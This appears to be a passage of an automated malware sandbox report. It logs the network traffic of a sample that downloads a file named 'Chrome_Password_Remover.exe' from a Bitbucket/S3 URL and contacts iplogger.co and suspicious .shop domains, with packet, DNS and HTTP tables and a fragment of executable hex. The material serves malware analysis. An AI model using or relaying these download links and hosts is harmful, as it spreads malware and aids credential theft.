                            Jul 8, 2024 10:10:56.688498020 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:56.688555956 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:56.688565969 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:56.688663006 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:56.736493111 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:57.782968998 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:57.783057928 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:57.783133984 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:57.783329964 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:57.783344984 CEST4434975240.113.103.199192.168.2.12

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 8, 2024 10:09:24.553006887 CEST6348753192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:24.561477900 CEST53634871.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:25.684520006 CEST5935953192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:25.707143068 CEST53593591.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:26.151252985 CEST6054753192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:26.151560068 CEST5950653192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:26.166291952 CEST53605471.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:26.168895960 CEST53595061.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:26.171804905 CEST53495861.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:26.183001041 CEST53592441.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:27.307591915 CEST53611011.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:28.014818907 CEST4972953192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:28.014983892 CEST5219153192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:28.028595924 CEST53521911.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:28.029824018 CEST53497291.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:30.092072964 CEST5902353192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:30.092228889 CEST6180653192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:30.242412090 CEST53618061.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:30.242443085 CEST53590231.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:44.417557955 CEST53521581.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:48.621939898 CEST5890253192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:48.631021023 CEST53589021.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:48.632971048 CEST6387253192.168.2.121.1.1.1
                            Jul 8, 2024 10:09:48.646733999 CEST53638721.1.1.1192.168.2.12
                            Jul 8, 2024 10:09:54.652957916 CEST53653621.1.1.1192.168.2.12
                            Jul 8, 2024 10:10:06.763546944 CEST53594651.1.1.1192.168.2.12
                            Jul 8, 2024 10:10:25.680989027 CEST53526291.1.1.1192.168.2.12
                            Jul 8, 2024 10:10:30.106232882 CEST5136653192.168.2.121.1.1.1
                            Jul 8, 2024 10:10:30.106435061 CEST5989153192.168.2.121.1.1.1
                            Jul 8, 2024 10:10:30.117753983 CEST53513661.1.1.1192.168.2.12
                            Jul 8, 2024 10:10:30.117852926 CEST53598911.1.1.1192.168.2.12
                            Jul 8, 2024 10:10:37.133090973 CEST53636921.1.1.1192.168.2.12

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 8, 2024 10:09:24.553006887 CEST192.168.2.121.1.1.10xaaf7Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.684520006 CEST192.168.2.121.1.1.10x5b0Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:26.151252985 CEST192.168.2.121.1.1.10xa9d4Standard query (0)iplogger.coA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:26.151560068 CEST192.168.2.121.1.1.10xa5aeStandard query (0)iplogger.co65IN (0x0001)false
                            Jul 8, 2024 10:09:28.014818907 CEST192.168.2.121.1.1.10x1f4dStandard query (0)iplogger.coA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:28.014983892 CEST192.168.2.121.1.1.10xf008Standard query (0)iplogger.co65IN (0x0001)false
                            Jul 8, 2024 10:09:30.092072964 CEST192.168.2.121.1.1.10xb1d4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:30.092228889 CEST192.168.2.121.1.1.10x4c95Standard query (0)www.google.com65IN (0x0001)false
                            Jul 8, 2024 10:09:48.621939898 CEST192.168.2.121.1.1.10xd864Standard query (0)willingyhollowsk.shopA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:48.632971048 CEST192.168.2.121.1.1.10xe79Standard query (0)potterryisiw.shopA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:10:30.106232882 CEST192.168.2.121.1.1.10xcdc9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:10:30.106435061 CEST192.168.2.121.1.1.10xdeabStandard query (0)www.google.com65IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 8, 2024 10:09:24.561477900 CEST1.1.1.1192.168.2.120xaaf7No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com52.216.42.97A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com52.217.235.57A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com3.5.24.49A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com16.182.96.113A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com16.182.68.201A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com54.231.161.1A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com3.5.12.179A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:25.707143068 CEST1.1.1.1192.168.2.120x5b0No error (0)s3-w.us-east-1.amazonaws.com52.217.114.33A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:26.166291952 CEST1.1.1.1192.168.2.120xa9d4No error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:26.166291952 CEST1.1.1.1192.168.2.120xa9d4No error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:26.168895960 CEST1.1.1.1192.168.2.120xa5aeNo error (0)iplogger.co65IN (0x0001)false
                            Jul 8, 2024 10:09:28.028595924 CEST1.1.1.1192.168.2.120xf008No error (0)iplogger.co65IN (0x0001)false
                            Jul 8, 2024 10:09:28.029824018 CEST1.1.1.1192.168.2.120x1f4dNo error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:28.029824018 CEST1.1.1.1192.168.2.120x1f4dNo error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:30.242412090 CEST1.1.1.1192.168.2.120x4c95No error (0)www.google.com65IN (0x0001)false
                            Jul 8, 2024 10:09:30.242443085 CEST1.1.1.1192.168.2.120xb1d4No error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:48.631021023 CEST1.1.1.1192.168.2.120xd864Name error (3)willingyhollowsk.shopnonenoneA (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:48.646733999 CEST1.1.1.1192.168.2.120xe79No error (0)potterryisiw.shop188.114.96.3A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:09:48.646733999 CEST1.1.1.1192.168.2.120xe79No error (0)potterryisiw.shop188.114.97.3A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:10:30.117753983 CEST1.1.1.1192.168.2.120xcdc9No error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                            Jul 8, 2024 10:10:30.117852926 CEST1.1.1.1192.168.2.120xdeabNo error (0)www.google.com65IN (0x0001)false

                            HTTP Request Dependency Graph

                            • bitbucket.org
                            • bbuseruploads.s3.amazonaws.com
                            • iplogger.co
                            • https:
                            • slscr.update.microsoft.com
                            • fs.microsoft.com
                            • potterryisiw.shop

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination Port
                            0192.168.2.124970940.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:05 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 32 75 67 67 64 74 51 6a 41 6b 75 2b 30 4a 51 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 66 34 62 62 32 62 37 37 31 66 30 66 65 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: 2uggdtQjAku+0JQF.1Context: 522f4bb2b771f0fe
                            2024-07-08 08:09:05 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-08 08:09:05 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 32 75 67 67 64 74 51 6a 41 6b 75 2b 30 4a 51 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 66 34 62 62 32 62 37 37 31 66 30 66 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 2uggdtQjAku+0JQF.2Context: 522f4bb2b771f0fe<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                            2024-07-08 08:09:05 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 32 75 67 67 64 74 51 6a 41 6b 75 2b 30 4a 51 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 66 34 62 62 32 62 37 37 31 66 30 66 65 0d 0a 0d 0a
                            Data Ascii: BND 3 CON\QOS 56MS-CV: 2uggdtQjAku+0JQF.3Context: 522f4bb2b771f0fe
                            2024-07-08 08:09:06 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-08 08:09:06 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 48 4d 35 62 37 32 7a 67 55 53 33 46 55 34 55 72 4a 65 2b 57 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: HHM5b72zgUS3FU4UrJe+WQ.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            1192.168.2.124971140.113.103.199443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:23 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 30 56 44 64 71 70 78 74 6b 55 4f 58 5a 4f 6b 79 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 39 33 38 38 36 65 63 66 31 30 34 64 38 30 35 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: 0VDdqpxtkUOXZOky.1Context: a93886ecf104d805
                            2024-07-08 08:09:23 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-08 08:09:23 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 30 56 44 64 71 70 78 74 6b 55 4f 58 5a 4f 6b 79 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 39 33 38 38 36 65 63 66 31 30 34 64 38 30 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 0VDdqpxtkUOXZOky.2Context: a93886ecf104d805<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                            2024-07-08 08:09:23 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 30 56 44 64 71 70 78 74 6b 55 4f 58 5a 4f 6b 79 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 39 33 38 38 36 65 63 66 31 30 34 64 38 30 35 0d 0a 0d 0a
                            Data Ascii: BND 3 CON\QOS 56MS-CV: 0VDdqpxtkUOXZOky.3Context: a93886ecf104d805
                            2024-07-08 08:09:23 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-08 08:09:23 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 51 44 6e 59 59 55 34 63 6b 57 59 6a 61 4a 33 6e 32 74 72 4f 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: FQDnYYU4ckWYjaJ3n2trOw.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.1249712104.192.141.14436864C:\Users\user\Desktop\dlcdkJcbbV.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:25 UTC117OUTGET /tanosx/clockbrix/downloads/Chrome_Password_Remover.exe HTTP/1.1
                            Host: bitbucket.org
                            Connection: Keep-Alive
                            2024-07-08 08:09:25 UTC4298INHTTP/1.1 302 Found
                            server: envoy
                            x-usage-quota-remaining: 999040.674
                            vary: Accept-Language, Origin
                            x-usage-request-cost: 978.13
                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                            Content-Type: text/html; charset=utf-8
                            x-b3-traceid: f45eb44fc09a6617
                            x-usage-output-ops: 0
                            x-used-mesh: False
                            x-dc-location: Micros-3
                            content-security-policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com se [TRUNCATED]
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Date: Mon, 08 Jul 2024 08:09:25 GMT
                            x-usage-user-time: 0.028071
                            x-usage-system-time: 0.001273
                            location: https://bbuseruploads.s3.amazonaws.com/443a209f-571f-419b-a313-2df7ae8bbefa/downloads/1a6d8155-b1f3-4621-9f17-89da4921df60/Chrome_Password_Remover.exe?response-content-disposition=attachment%3B%20filename%3D%22Chrome_Password_Remover.exe%22&AWSAccessKeyId=ASIA6KOSE3BND3U57RJW&Signature=luV%2FmWytJ4A8wh9TkqLQ1cRDVJ8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEgaCXVzLWVhc3QtMSJGMEQCIF0d%2F3b7L6xm4zKhRgvVPMVVzKwwpzi37CH%2BZK%2BIn0ZyAiBuyp8167XQoYPCv8%2FzuwivvWtFFMtk0%2FZgHtj3s4dd6yqnAggREAAaDDk4NDUyNTEwMTE0NiIMbeju1BPQLnRrYAjWKoQCjmSU9lQ%2F5yuuhuKx69xZT%2B%2FtlgjDBjDte46VYpmATd%2FsC5Zrcf%2Bm9f8r1H2oJb67RIKRFSFe7KeW88oU0Xa4YVu91FiLLREur8XVD79Biodab9hv%2FtWVZnaNWO2INMlv85%2FQJ46pMfZPc0rHJ2W4GnyVl%2BJbU6TVzyNY6PwF4F%2B7AcjZLoAn8YIq8IOxB8mYjZQUlQlvsoBzTeUgZzndc975%2B6vBLYVZkbVeJeQ952IK3JQIUOMlnrH%2BnQkkCZRCd8427Vq3HgSLewDmhRJNIzzbZMnyvNhw%2FUWfGxI7wphRhHqMBJRBkCDowsJDU86KfBt84kZAB%2FCW8OhYpl7%2BsyXf3rkwv7eutAY6ngELbJg3CTD%2Fk7eP6EnZldU0FrVs5%2Bvbi%2FfxapLmwJHR5gknJqQv7XoMPAV3lP%2BxX%2FjDeLci2YjgZFwhjP2AQRCJf [TRUNCATED]
                            expires: Mon, 08 Jul 2024 08:09:25 GMT
                            x-served-by: 91bc265351c1
                            x-envoy-upstream-service-time: 77
                            content-language: en
                            x-view-name: bitbucket.apps.downloads.views.download_file
                            x-b3-spanid: f45eb44fc09a6617
                            x-static-version: 54a8ccfaf741
                            x-render-time: 0.06552314758300781
                            Connection: close
                            x-usage-input-ops: 0
                            x-version: 54a8ccfaf741
                            x-request-count: 3064
                            x-frame-options: SAMEORIGIN
                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.124971352.216.42.974436864C:\Users\user\Desktop\dlcdkJcbbV.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:26 UTC1209OUTGET /443a209f-571f-419b-a313-2df7ae8bbefa/downloads/1a6d8155-b1f3-4621-9f17-89da4921df60/Chrome_Password_Remover.exe?response-content-disposition=attachment%3B%20filename%3D%22Chrome_Password_Remover.exe%22&AWSAccessKeyId=ASIA6KOSE3BND3U57RJW&Signature=luV%2FmWytJ4A8wh9TkqLQ1cRDVJ8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEgaCXVzLWVhc3QtMSJGMEQCIF0d%2F3b7L6xm4zKhRgvVPMVVzKwwpzi37CH%2BZK%2BIn0ZyAiBuyp8167XQoYPCv8%2FzuwivvWtFFMtk0%2FZgHtj3s4dd6yqnAggREAAaDDk4NDUyNTEwMTE0NiIMbeju1BPQLnRrYAjWKoQCjmSU9lQ%2F5yuuhuKx69xZT%2B%2FtlgjDBjDte46VYpmATd%2FsC5Zrcf%2Bm9f8r1H2oJb67RIKRFSFe7KeW88oU0Xa4YVu91FiLLREur8XVD79Biodab9hv%2FtWVZnaNWO2INMlv85%2FQJ46pMfZPc0rHJ2W4GnyVl%2BJbU6TVzyNY6PwF4F%2B7AcjZLoAn8YIq8IOxB8mYjZQUlQlvsoBzTeUgZzndc975%2B6vBLYVZkbVeJeQ952IK3JQIUOMlnrH%2BnQkkCZRCd8427Vq3HgSLewDmhRJNIzzbZMnyvNhw%2FUWfGxI7wphRhHqMBJRBkCDowsJDU86KfBt84kZAB%2FCW8OhYpl7%2BsyXf3rkwv7eutAY6ngELbJg3CTD%2Fk7eP6EnZldU0FrVs5%2Bvbi%2FfxapLmwJHR5gknJqQv7XoMPAV3lP%2BxX%2FjDeLci2YjgZFwhjP2AQRCJfIek5nzIh7IgIrvoRpB5TJ9eJmXRqfNfeB1Tazn%2FKTs [TRUNCATED]
                            Host: bbuseruploads.s3.amazonaws.com
                            Connection: Keep-Alive
                            2024-07-08 08:09:26 UTC560INHTTP/1.1 200 OK
                            x-amz-id-2: mckRzaPvJxJ0U24MlvvTDqBD45p7yvjSvAhnLZgFFu3kj9nr0W8H40mQJm7Uiyesbrzf6XNwUIQ=
                            x-amz-request-id: 8N41MMQDNX3Z3A8N
                            Date: Mon, 08 Jul 2024 08:09:27 GMT
                            Last-Modified: Sat, 06 Jul 2024 19:30:31 GMT
                            ETag: "f308be1162c86c3d72ad06c4c85a67d4"
                            x-amz-server-side-encryption: AES256
                            x-amz-version-id: zgzdnwGQr1j8.sD0q2Dqp3Nq4XzvVcpm
                            Content-Disposition: attachment; filename="Chrome_Password_Remover.exe"
                            Accept-Ranges: bytes
                            Content-Type: application/x-msdos-program
                            Server: AmazonS3
                            Content-Length: 7386624
                            Connection: close
                            2024-07-08 08:09:26 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 5c 27 00 00 b2 70 00 00 f0 05 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 20 77 00 00 04 00 00 80 8e 71 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$\'p@ wq`
                            2024-07-08 08:09:26 UTC464INData Raw: 89 de 31 c0 48 8d 1d 07 0f 3e 00 e8 70 b4 04 00 e8 0b 69 00 00 48 89 c3 48 8d 05 61 db 37 00 90 e8 1b 28 03 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 86 05 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 e9 b2 fd ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc b8 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b6 08 38 0b 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b7 08 66 39 0b 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 08 39 0b 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 08 48 39 0b 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                            Data Ascii: 1H>piHHa7(HD$H\$HL$HD$H\$HL$8f99HH9
